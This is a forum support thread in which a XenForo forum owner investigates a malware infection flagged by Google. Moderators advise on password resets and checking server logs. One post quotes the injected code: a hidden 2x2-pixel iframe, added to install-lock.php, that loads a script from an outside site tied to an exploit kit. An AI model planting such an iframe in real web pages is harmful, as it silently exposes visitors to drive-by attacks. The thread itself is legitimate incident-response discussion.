• This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn more.

XF 1.1 Google notified me of malware infection

chrisj

Active member
#1
I found a bunch of files in the js directory. The file that google warned me is called "js2.php". It just creates an iframe for js.php There are a few other files that contain data. The server is telling me the files were created by the user www-data.

I'm not really sure where to go from here, I renamed "js2.php". I am trying to track what is referencing "js2.php".

The malware uses two urls and one of them I found a blog post about on blog.dynamoo.com mentioning it as a dynamic dns being used by a Neutrino exploit kit where "malicious code is being appended to legitimate .js files on those site".
 

chrisj

Active member
#3
Looks to have come common elements. I found one reference to js2.php.

This line was added to the top of install-lock.php:
<iframe src="http://psvitaforum.com/js/js2.php" width=2 height=2 frameborder="0"></iframe>
Now I need to find out how this all happened.

I am on a linode VPS. install-lock.php's permission is 777 however should that be a problem since I am not on a shared server?
 
Last edited:

chrisj

Active member
#4
I have only used the root account which had a very strong password. Based these facts, how much access could the hackers have gotten?
  • The only account was root with a very strong password.
  • They modified install-lock.php file which was set to chmod 777.
  • They created several files in the js folder.
  • The rest of the data seems intact. Hopefully they did not have access the database.
install-lock.php would never be accessed by the common user so the hack would be very ineffective which leads me to believe that they did not have root access. Somehow, google was able to find out about the javascript file.
 

Jake Bunce

XenForo moderator
Staff member
#11
Should I force all users to reset their password in case the database was viewed?
The main concern for the forum would be admin and mod passwords. Regular accounts aren't a concern for the security of the forum, but your users might appreciate being notified about a possible breach so they can reset their passwords themselves.
 
#12
The main concern for the forum would be admin and mod passwords. Regular accounts aren't a concern for the security of the forum, but your users might appreciate being notified about a possible breach so they can reset their passwords themselves.
Agreed.

It's how Xenforo stores them:
ok. Just checking.

Have you noticed anything odd in your access logs or error logs on the server itself and not xenforo logs?
 

chrisj

Active member
#13
I checked auth.log and noticed I have been bombarded with ssh log in attempts. I will close that down.

If install-lock.php was modified, does that mean a log in attempt was successful?